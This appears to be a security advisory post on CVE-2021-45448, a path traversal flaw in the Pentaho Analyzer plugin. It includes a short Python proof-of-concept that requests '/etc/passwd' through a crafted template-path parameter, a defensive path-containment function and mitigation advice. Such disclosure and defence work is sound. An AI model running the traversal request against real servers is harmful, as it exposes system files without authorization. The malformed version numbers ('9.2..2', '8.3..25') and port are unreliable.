If you use Pentaho Business Analytics Server versions before 9.2..2 and 8.3..25 with the Pentaho Analyzer plugin, you may be exposed to a path traversal vulnerability. It allows an attacker to read files and directories outside the intended directory by supplying crafted pathname input that the software uses to locate resources.

Vulnerability Details

The Pentaho Business Analytics Server is exposed to a path traversal vulnerability when using the Analyzer plugin. The software constructs a pathname using external input but does not properly neutralize elements within the pathname, such as ".." and "/" separators. As a result, an attacker can exploit this vulnerability to access files and directories elsewhere on the system.

The following code snippet demonstrates a possible exploitation of this vulnerability:

import requests

# Base URL of the server under test (placeholder, replace with the real one)
PENTAHO_URL = "http://your-pentaho-server-url:808"
# Traversal sequence that climbs out of the template directory to an OS file
TEMPLATE_PATH = "../../../../../etc/passwd"

# The template-path parameter is used by the server to build a file path
payload = {'_PENTAHO_Analyzer_template-path': TEMPLATE_PATH}
response = requests.post(PENTAHO_URL + "/pentaho/api/analyzer/getTemplate", data=payload, timeout=10)

# A 200 response with file content means the traversal was not neutralised
if response.status_code == 200:
    print("Vulnerable to CVE-2021-45448")
    print("Extracted file content:")
    print(response.text)
else:
    print("Not vulnerable to CVE-2021-45448")

This script sends a POST request to the getTemplate endpoint with a payload containing the path to the targeted file. In this example the target is "/etc/passwd", the file that lists a Unix-based system's user accounts.
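As an added example that is not part of the original post or of Pentaho's own code, the following Python function shows the check that a template lookup of this kind must perform: it canonicalises the requested path against a fixed base directory and rejects any request whose resolved location falls outside it. The base directory, the function names and the sample inputs are assumptions made for illustration.

```python
import os
import posixpath
from urllib.parse import unquote


class PathTraversalError(ValueError):
    """Raised when a requested template path would escape the base directory."""


def resolve_template_path(base_dir: str, requested: str) -> str:
    """Return the canonical on-disk path of `requested` inside `base_dir`.

    Hypothetical hardened lookup (an assumption, not Pentaho's code): the
    user-supplied value is never joined onto the base directory without the
    containment check below.
    """
    # Decode percent-encoding once so "%2e%2e/" is seen as "../". Skip this
    # step if the web framework has already decoded the parameter, otherwise
    # "%252e" style double encoding would be decoded twice.
    decoded = unquote(requested)
    # Treat backslashes as separators so "..\\.." cannot slip past the check
    decoded = decoded.replace("\\", "/")
    # NUL bytes can truncate the path in lower-level file APIs
    if "\0" in decoded:
        raise PathTraversalError("NUL byte in template path")
    # Templates are always relative to base_dir; an absolute path is never valid
    if posixpath.isabs(decoded):
        raise PathTraversalError(f"absolute template path rejected: {requested!r}")
    base_real = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks, so a link inside base_dir
    # that points outside it is caught as well
    candidate = os.path.realpath(os.path.join(base_real, decoded))
    # commonpath (not startswith) so "/opt/pentaho/templatesX" is not accepted
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PathTraversalError(f"template path escapes base directory: {requested!r}")
    return candidate


def is_safe_template_path(base_dir: str, requested: str) -> bool:
    """Boolean form of resolve_template_path for callers that only need a verdict."""
    try:
        resolve_template_path(base_dir, requested)
        return True
    except PathTraversalError:
        return False


if __name__ == "__main__":
    # Constructed sample inputs: one legitimate template name and the kinds of
    # traversal strings the advisory describes
    BASE = "/opt/pentaho/templates"  # assumed location, not Pentaho's real layout
    for req in ["default/report.xml",
                "../../../../../etc/passwd",
                "%2e%2e/%2e%2e/%2e%2e/etc/passwd",
                "/etc/passwd",
                "..\\..\\windows\\win.ini"]:
        verdict = "ok" if is_safe_template_path(BASE, req) else "REJECTED"
        print(f"{verdict:8} {req}")
```

The containment test compares canonical paths with os.path.commonpath rather than a string prefix, because a prefix check would accept a sibling directory whose name merely begins with the base directory's name. Decoding and separator handling happen before canonicalisation so that the check sees the same path the file system would.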

Original References

1. The recent release notes for Pentaho Business Analytics Server mention fixes for CVE-2021-45448: Release Notes
2. Details about the CVE-2021-45448 vulnerability are available on the official NIST database: NIST CVE-2021-45448

Mitigation

To prevent this vulnerability from being exploited, it's recommended to update Pentaho Business Analytics Server to the latest version.

Update to version 8.3..25 or higher.

In addition to updating the software, users should disable any unnecessary plugins and remove or disable any API endpoints that are not in use.

Conclusion

CVE-2021-45448 is a critical security vulnerability, and users are advised to take action to keep their data and systems secure. By updating your Pentaho Business Analytics Server installation to the recommended versions and taking precautionary measures, such as disabling unused plugins and endpoints, you can protect your system from this path traversal vulnerability.

Timeline

Published on: 11/02/2022 16:15:00 UTC
Last modified on: 11/04/2022 02:48:00 UTC